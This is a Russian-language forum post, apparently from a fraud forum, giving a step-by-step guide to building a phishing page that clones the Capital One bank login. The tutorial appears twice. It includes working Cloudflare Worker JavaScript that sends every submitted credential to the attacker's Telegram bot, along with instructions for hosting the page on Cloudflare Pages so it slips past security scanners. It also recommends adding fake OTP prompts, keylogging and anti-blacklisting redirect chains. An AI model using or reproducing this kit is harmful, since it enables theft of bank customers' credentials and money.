Friend
Professional
- Messages
- 2,653
- Reaction score
- 837
- Points
- 113
Создайте любую scampage/Фишер с нуля (+ ваш собственный бот Telegram)
Одна вещь, которая действительно сбивает с толку, это то, как много новичков в этой игре на самом деле покупают scampages у случайных людей в Telegram. Это просто глупо. Это пустая трата денег, просто и понятно. Плюс это не долгосрочная стратегия. Веб-сайты обновляют свои дизайны быстрее, чем наркоман меняет настроение, делая ваш купленный scampage устаревшим через пару месяцев. Внезапно вы держите в руках мусор в киберпространстве — жертвы почувствуют дерьмо за милю и не будут вводить ни хрена.
Вот почему существует это руководство. Я собираюсь показать вам, как создавать свои собственные фишеры и scampages. Это не ракетостроение, и это гораздо более практично, чем бросать свои деньги какому-то тупому продавцу. Так что будьте внимательны и давайте сделаем это.
Анатомия фишера
Прежде чем мы углубимся в создание вашего собственного фишера, вам нужно понять, как работают эти вещи. Фишер по сути делится на два важнейших компонента — представьте себе, что это цифровая стрижка «маллет»: бизнес спереди и вечеринка сзади.
Фронтенд (Красивое Лицо):
Это то, что на самом деле видят ваши метки — поля ввода на странице входа, логотипы и все это услада для глаз. Это точная копия законного сайта, на который вы нацелились, вплоть до значка. Frontend должен быть безупречным до пикселя, потому что люди на удивление хорошо замечают, когда что-то не так, даже если не могут объяснить почему. Одна неровная кнопка или неправильный шрифт, и ваш коэффициент конверсии (количество людей, которые действительно вводят свои данные) идет к черту.
Бэкэнд (Мастер зарабатывания денег):
Вот где происходит волшебство. Вместо того, чтобы хранить данные в базе данных, мы собираемся использовать Cloudflare Worker для захвата отправленных форм и отправки их напрямую в ваш Telegram с помощью бота. Каждый раз, когда кто-то отправляет свои учетные данные, вы будете получать мгновенное оповещение в Telegram. Это просто и экономически эффективно, и держит вас в курсе событий в режиме реального времени.
Прелесть понимания этих двух компонентов в том, что вы можете смешивать и сочетать их как строительные блоки. Как только вы освоите создание обеих частей, вы сможете быстро адаптироваться к любому целевому сайту. Черт возьми, вы даже можете запустить несколько фронтендов — разные банки, провайдеры электронной почты, что угодно — все это будет работать на одном бэкенде. Это чертовски эффективно и позволяет вам масштабировать свою работу, не перестраивая все с нуля. И это именно то, что мы собираемся изучить.
Создание фронтенда
Пришло время запачкать руки и создать красивое лицо — фронтенд. Для этой демонстрации мы собираемся клонировать CapitalOne. Почему CapitalOne? Потому что банки — это в основном то, для чего вы будете использовать этих фишеров, а страница входа в CapitalOne — идеальное место для начала отработки навыков. Не волнуйтесь, как только вы это сделаете, вы сможете содрать любой сайт, какой захотите — банковскую электронную коммерцию, как хотите.
Шаг 1: Кража лица CapitalOne
Помните, мы не кодируем это дерьмо с нуля, как какой-то скрипт-кидди. Мы цифровые бандиты, а не веб-разработчики. Идите и возьмите это расширение Chrome под названием «SingleFile». Эта маленькая жемчужина позволяет вам объединить целую веб-страницу — HTML CSS изображения, всю чертову энчиладу — в один аккуратный HTML-файл. Это как оторвать пластырь, но для веб-сайтов.
Шаг 2: Получите страницу входа
Перейдите на защищенную страницу покупок CapitalOne: Capital One Вход: Войдите, чтобы получить доступ к своим учетным записям. Да, это она. Щелкните значок расширения SingleFile в своем браузере. Бум. Вот так вы загрузили всю чертову страницу.
Шаг 3: Переименуйте и сохраните
Переименуйте этот свежеснятый файл в `index.html`. Это первая страница, которую они ищут, когда вы открываете веб-сайт. Сохраните его где-нибудь, где вы сможете найти его позже, например, на рабочем столе — если только ваш рабочий стол уже не является цифровой пустошью порно и вредоносного ПО, в этом случае удачи в поисках дерьма.
Шаг 4: Быстрое и грязное редактирование (на данный момент)
Откройте этот файл `index.html` в текстовом редакторе, таком как VS Code, Sublime Text или Notepad++. Нам нужно убедиться, что этот фронтенд действительно работает, прежде чем приступать к работе с бэкендом.
Сначала откройте его в своем браузере — он похож на настоящую страницу входа CapitalOne? Если нет, вы облажались с шагом SingleFile. Вернитесь и попробуйте еще раз, пока не убедитесь, что все в порядке.
Теперь для быстрой настройки теста. Перейдите на webhook.site и возьмите URL-адрес веб-перехватчика — это будет наш временный перехватчик данных. Найдите тег `<form>` в вашем HTML и измените его атрибут `action` на URL-адрес вашего веб-перехватчика. Это заставит отправку форм переходить на webhook.site вместо серверов CapitalOne.
Затем найдите поля ввода имени пользователя и пароля (они будут тегами `<input>`). Добавьте `name="username"` в поле имени пользователя и `name="password"` в поле пароля. Это сообщает браузеру о необходимости передавать данные. Разные сайты используют разные имена, поэтому вам нужно будет настроить это для каждой цели. Но все они чаще всего используют один элемент формы.
Вот и все для тестирования. Откройте свою страницу, введите какие-нибудь поддельные данные для входа и нажмите «Отправить». Если данные отображаются на webhook.site, ваш фронтенд работает. Если нет, перепроверьте изменения и попробуйте еще раз. Как только он заработает, вы готовы настроить настоящий бэкенд.
Настройка бэкенда
Теперь перейдем к мозгу операции — бэкенду. Вместо использования базы данных мы используем Cloudflare Workers для мгновенной пересылки полученных учетных данных в вашу учетную запись Telegram через скрипт bo. Это не только экономически эффективно, но и дает вам немедленные оповещения, когда кто-то отправляет свою информацию.
Шаг 1: Учетная запись Cloudflare (ну конечно)
Тащите свою задницу в Cloudflare и создайте бесплатный аккаунт. Это необязательно. Мы используем Cloudflare для всего — и для бэкэнда , и для фронтэнда. Вам нужно настроить его, прежде чем вы сможете начать готовить. Так что приступайте.
Шаг 2: Настройте своего бота Telegram
Сначала создайте своего бота Telegram, отправив сообщение @BotFather в Telegram. Введите `/newbot` и следуйте его подсказкам, чтобы назвать своего бота. BotFather выдаст API-токен, который выглядит так: `63xxxxxx71:AAFoxxxxn0hwA-2TVSxxxNf4c`. Сохраните эту фигню — она вам понадобится.
Теперь о вашем идентификаторе чата. Вот как его получить:
Чтобы проверить, что все работает:
Шаг 3: рабочее время Cloudflare
Теперь перейдите в раздел «Workers» на панели управления Cloudflare и создайте нового Worker. Cloudflare предоставляет онлайн-редактор кода. Не паникуйте — мы не пишем здесь роман. Вставьте следующий код в Worker:
Шаг 4: Тестирование вашего Cloudflare Worker
Теперь пришло время протестировать ваш новый бэкенд. Сначала вернитесь к HTML-форме scampages и замените URL-адрес webhook.site на URL-адрес вашего Cloudflare Worker (он должен выглядеть примерно так: "your-worker.your-subdomain.workers.dev").
После этого протестируйте весь поток:
Если все настроено правильно, вы должны получить сообщение Telegram с этими тестовыми учетными данными.
Шаг 5: Разверните свой Scampage
Теперь для финальной части - запуск вашего фишера на страницах Cloudflare. Это дает вам гладкий профессионально выглядящий домен и всемирное распространение CDN.
В течение нескольких секунд Cloudflare предоставит вашему фишеру `your-project.pages.dev`, обслуживая его по HTTPS, чтобы он выглядел как настоящий. Ваши жертвы не увидят никаких сомнительных перенаправлений или предупреждений SSL — просто чистая профессионально выглядящая страница, обслуживаемая напрямую из инфраструктуры Cloudflare. И поскольку она работает на законной инфраструктуре Cloudflare, она проскочит мимо большинства основных сканеров безопасности. Но помните, что это только основа — вас ждет целый мир передовых методов и оптимизаций, которые вы сможете изучить.
Заключение
Это руководство едва ли касается поверхности возможностей современной фишинговой инфраструктуры. Да, первоначальная настройка может заставить вас заболеть — борьба с HTML-формами, изучение панели управления Cloudflare и отладка ботов Telegram — это не совсем прогулка в парке. Но как только вы освоите основы? Это дерьмо становится мышечной памятью.
Вас ждет целый мир оптимизаций. Возьмите несколько старых доменов с чистой репутацией. Настройте правильный парсинг, чтобы извлечь именно те данные, которые вам нужны. Добавьте JavaScript для сбора отпечатков браузера, реализуйте поддельные запросы 2FA/OTP, захватывайте данные автозаполнения и записывайте нажатия клавиш. Добавьте проверку для фильтрации мусорных отправлений и обнаружения виртуальных машин/средств безопасности. Зашифруйте содержимое обслуживаемого HTML и используйте цепочки перенаправлений, чтобы предотвратить автоматическое внесение в черный список. Возможности безграничны, и именно это делает это ремесло одновременно сложным и полезным.
Помните, однако, что фишинговая страница хороша ровно настолько, насколько хороша ее самая слабая ссылка. У вас может быть самая гладкая настройка в мире, но если ваш HTML выглядит так, будто его написала пьяная обезьяна, или если ваш домен кричит "TOTALLY-LEGIT-BANK-SECURE-LOGIN.TK", вы просто тратите время. Гордитесь своим мастерством, обращайте внимание на детали и никогда не прекращайте учиться. Теперь выходите и создайте что-нибудь прекрасное.
(c) Telegram: d0ctrine
Наш чат Telegram: BinX Labs
Одна вещь, которая действительно сбивает с толку, это то, как много новичков в этой игре на самом деле покупают scampages у случайных людей в Telegram. Это просто глупо. Это пустая трата денег, просто и понятно. Плюс это не долгосрочная стратегия. Веб-сайты обновляют свои дизайны быстрее, чем наркоман меняет настроение, делая ваш купленный scampage устаревшим через пару месяцев. Внезапно вы держите в руках мусор в киберпространстве — жертвы почувствуют дерьмо за милю и не будут вводить ни хрена.
Вот почему существует это руководство. Я собираюсь показать вам, как создавать свои собственные фишеры и scampages. Это не ракетостроение, и это гораздо более практично, чем бросать свои деньги какому-то тупому продавцу. Так что будьте внимательны и давайте сделаем это.
Анатомия фишера
Прежде чем мы углубимся в создание вашего собственного фишера, вам нужно понять, как работают эти вещи. Фишер по сути делится на два важнейших компонента — представьте себе, что это цифровая стрижка «маллет»: бизнес спереди и вечеринка сзади.
Фронтенд (Красивое Лицо):
Это то, что на самом деле видят ваши метки — поля ввода на странице входа, логотипы и все это услада для глаз. Это точная копия законного сайта, на который вы нацелились, вплоть до значка. Frontend должен быть безупречным до пикселя, потому что люди на удивление хорошо замечают, когда что-то не так, даже если не могут объяснить почему. Одна неровная кнопка или неправильный шрифт, и ваш коэффициент конверсии (количество людей, которые действительно вводят свои данные) идет к черту.
Бэкэнд (Мастер зарабатывания денег):
Вот где происходит волшебство. Вместо того, чтобы хранить данные в базе данных, мы собираемся использовать Cloudflare Worker для захвата отправленных форм и отправки их напрямую в ваш Telegram с помощью бота. Каждый раз, когда кто-то отправляет свои учетные данные, вы будете получать мгновенное оповещение в Telegram. Это просто и экономически эффективно, и держит вас в курсе событий в режиме реального времени.
Прелесть понимания этих двух компонентов в том, что вы можете смешивать и сочетать их как строительные блоки. Как только вы освоите создание обеих частей, вы сможете быстро адаптироваться к любому целевому сайту. Черт возьми, вы даже можете запустить несколько фронтендов — разные банки, провайдеры электронной почты, что угодно — все это будет работать на одном бэкенде. Это чертовски эффективно и позволяет вам масштабировать свою работу, не перестраивая все с нуля. И это именно то, что мы собираемся изучить.
Создание фронтенда
Пришло время запачкать руки и создать красивое лицо — фронтенд. Для этой демонстрации мы собираемся клонировать CapitalOne. Почему CapitalOne? Потому что банки — это в основном то, для чего вы будете использовать этих фишеров, а страница входа в CapitalOne — идеальное место для начала отработки навыков. Не волнуйтесь, как только вы это сделаете, вы сможете содрать любой сайт, какой захотите — банковскую электронную коммерцию, как хотите.
Шаг 1: Кража лица CapitalOne
Помните, мы не кодируем это дерьмо с нуля, как какой-то скрипт-кидди. Мы цифровые бандиты, а не веб-разработчики. Идите и возьмите это расширение Chrome под названием «SingleFile». Эта маленькая жемчужина позволяет вам объединить целую веб-страницу — HTML CSS изображения, всю чертову энчиладу — в один аккуратный HTML-файл. Это как оторвать пластырь, но для веб-сайтов.
Шаг 2: Получите страницу входа
Перейдите на защищенную страницу покупок CapitalOne: Capital One Вход: Войдите, чтобы получить доступ к своим учетным записям. Да, это она. Щелкните значок расширения SingleFile в своем браузере. Бум. Вот так вы загрузили всю чертову страницу.
Шаг 3: Переименуйте и сохраните
Переименуйте этот свежеснятый файл в `index.html`. Это первая страница, которую они ищут, когда вы открываете веб-сайт. Сохраните его где-нибудь, где вы сможете найти его позже, например, на рабочем столе — если только ваш рабочий стол уже не является цифровой пустошью порно и вредоносного ПО, в этом случае удачи в поисках дерьма.
Шаг 4: Быстрое и грязное редактирование (на данный момент)
Откройте этот файл `index.html` в текстовом редакторе, таком как VS Code, Sublime Text или Notepad++. Нам нужно убедиться, что этот фронтенд действительно работает, прежде чем приступать к работе с бэкендом.
Сначала откройте его в своем браузере — он похож на настоящую страницу входа CapitalOne? Если нет, вы облажались с шагом SingleFile. Вернитесь и попробуйте еще раз, пока не убедитесь, что все в порядке.
Теперь для быстрой настройки теста. Перейдите на webhook.site и возьмите URL-адрес веб-перехватчика — это будет наш временный перехватчик данных. Найдите тег `<form>` в вашем HTML и измените его атрибут `action` на URL-адрес вашего веб-перехватчика. Это заставит отправку форм переходить на webhook.site вместо серверов CapitalOne.
Затем найдите поля ввода имени пользователя и пароля (они будут тегами `<input>`). Добавьте `name="username"` в поле имени пользователя и `name="password"` в поле пароля. Это сообщает браузеру о необходимости передавать данные. Разные сайты используют разные имена, поэтому вам нужно будет настроить это для каждой цели. Но все они чаще всего используют один элемент формы.
Вот и все для тестирования. Откройте свою страницу, введите какие-нибудь поддельные данные для входа и нажмите «Отправить». Если данные отображаются на webhook.site, ваш фронтенд работает. Если нет, перепроверьте изменения и попробуйте еще раз. Как только он заработает, вы готовы настроить настоящий бэкенд.
Настройка бэкенда
Теперь перейдем к мозгу операции — бэкенду. Вместо использования базы данных мы используем Cloudflare Workers для мгновенной пересылки полученных учетных данных в вашу учетную запись Telegram через скрипт bo. Это не только экономически эффективно, но и дает вам немедленные оповещения, когда кто-то отправляет свою информацию.
Шаг 1: Учетная запись Cloudflare (ну конечно)
Тащите свою задницу в Cloudflare и создайте бесплатный аккаунт. Это необязательно. Мы используем Cloudflare для всего — и для бэкэнда , и для фронтэнда. Вам нужно настроить его, прежде чем вы сможете начать готовить. Так что приступайте.
Шаг 2: Настройте своего бота Telegram
Сначала создайте своего бота Telegram, отправив сообщение @BotFather в Telegram. Введите `/newbot` и следуйте его подсказкам, чтобы назвать своего бота. BotFather выдаст API-токен, который выглядит так: `63xxxxxx71:AAFoxxxxn0hwA-2TVSxxxNf4c`. Сохраните эту фигню — она вам понадобится.
Теперь о вашем идентификаторе чата. Вот как его получить:
- Найдите нового бота в Telegram и отправьте ему сообщение (достаточно просто «/start»)
- Возьмите токен вашего бота и вставьте его в этот URL:
` https://api.telegram.org/bot {YOUR_BOT_TOKEN}/getUpdates`
(замените {YOUR_BOT_TOKEN} на фактический токен, оставив «bot» впереди) - Откройте этот URL в своем браузере. Вы увидите ответ JSON с данными вашего чата. Найдите `"chat": {"id": 21xxxxx38}` - это число и есть ваш идентификатор чата.
Чтобы проверить, что все работает:
- Попробуйте отправить тестовое сообщение, перейдя по ссылке:
`https://api.telegram.org/bot {YOUR_BOT_TOKEN}/sendMessage?chat_id={YOUR_CHAT_ID}&text=working` - Проверьте, если вы видите сообщение "test123" в вашем чате бота, вы в порядке. Если нет, дважды проверьте свой токен и идентификатор чата.
Шаг 3: рабочее время Cloudflare
Теперь перейдите в раздел «Workers» на панели управления Cloudflare и создайте нового Worker. Cloudflare предоставляет онлайн-редактор кода. Не паникуйте — мы не пишем здесь роман. Вставьте следующий код в Worker:
JavaScript:
addEventListener(fetch event => {
event.respondWith(handleRequest(event.request));
});
async function handleRequest(request) {
if (request.method === POST) {
const formData = await request.formData();
let message = "New phisher data received:\n";
for (const [key value] of formData.entries()) {
message += `${key}: ${value}\n`;
}
const botToken = YOUR_TELEGRAM_BOT_TOKEN; // Replace with your Telegram bot token
const chatId = YOUR_CHAT_ID; // Replace with your Telegram chat ID
const telegramUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;
await fetch(telegramUrl {
method: POST
headers: { Content-Type: application/json }
body: JSON.stringify({
chat_id: chatId
text: message
})
});
return Response.redirect(https://google.com 302);
} else {
return Response.redirect(https://google.com 302);
}
}Шаг 4: Тестирование вашего Cloudflare Worker
Теперь пришло время протестировать ваш новый бэкенд. Сначала вернитесь к HTML-форме scampages и замените URL-адрес webhook.site на URL-адрес вашего Cloudflare Worker (он должен выглядеть примерно так: "your-worker.your-subdomain.workers.dev").
После этого протестируйте весь поток:
- Откройте свой scampage с помощью Chrome
- Заполните несколько поддельных учетных данных
- Нажмите «Отправить»
Если все настроено правильно, вы должны получить сообщение Telegram с этими тестовыми учетными данными.
Шаг 5: Разверните свой Scampage
Теперь для финальной части - запуск вашего фишера на страницах Cloudflare. Это дает вам гладкий профессионально выглядящий домен и всемирное распространение CDN.
- Перейдите в раздел «Страницы» на панели управления Cloudflare.
- Нажмите «Создать проект».
- Выберите «Прямая загрузка»
- Либо:
- Создайте ZIP-файл, содержащий только ваш index.html
- Или создайте пустую папку и поместите в нее ваш index.html - Перетащите файл/папку в область загрузки.
- Дайте вашему проекту имя (оно будет частью вашего URL)
- Нажмите «Развернуть»
В течение нескольких секунд Cloudflare предоставит вашему фишеру `your-project.pages.dev`, обслуживая его по HTTPS, чтобы он выглядел как настоящий. Ваши жертвы не увидят никаких сомнительных перенаправлений или предупреждений SSL — просто чистая профессионально выглядящая страница, обслуживаемая напрямую из инфраструктуры Cloudflare. И поскольку она работает на законной инфраструктуре Cloudflare, она проскочит мимо большинства основных сканеров безопасности. Но помните, что это только основа — вас ждет целый мир передовых методов и оптимизаций, которые вы сможете изучить.
Заключение
Это руководство едва ли касается поверхности возможностей современной фишинговой инфраструктуры. Да, первоначальная настройка может заставить вас заболеть — борьба с HTML-формами, изучение панели управления Cloudflare и отладка ботов Telegram — это не совсем прогулка в парке. Но как только вы освоите основы? Это дерьмо становится мышечной памятью.
Вас ждет целый мир оптимизаций. Возьмите несколько старых доменов с чистой репутацией. Настройте правильный парсинг, чтобы извлечь именно те данные, которые вам нужны. Добавьте JavaScript для сбора отпечатков браузера, реализуйте поддельные запросы 2FA/OTP, захватывайте данные автозаполнения и записывайте нажатия клавиш. Добавьте проверку для фильтрации мусорных отправлений и обнаружения виртуальных машин/средств безопасности. Зашифруйте содержимое обслуживаемого HTML и используйте цепочки перенаправлений, чтобы предотвратить автоматическое внесение в черный список. Возможности безграничны, и именно это делает это ремесло одновременно сложным и полезным.
Помните, однако, что фишинговая страница хороша ровно настолько, насколько хороша ее самая слабая ссылка. У вас может быть самая гладкая настройка в мире, но если ваш HTML выглядит так, будто его написала пьяная обезьяна, или если ваш домен кричит "TOTALLY-LEGIT-BANK-SECURE-LOGIN.TK", вы просто тратите время. Гордитесь своим мастерством, обращайте внимание на детали и никогда не прекращайте учиться. Теперь выходите и создайте что-нибудь прекрасное.
(c) Telegram: d0ctrine
Наш чат Telegram: BinX Labs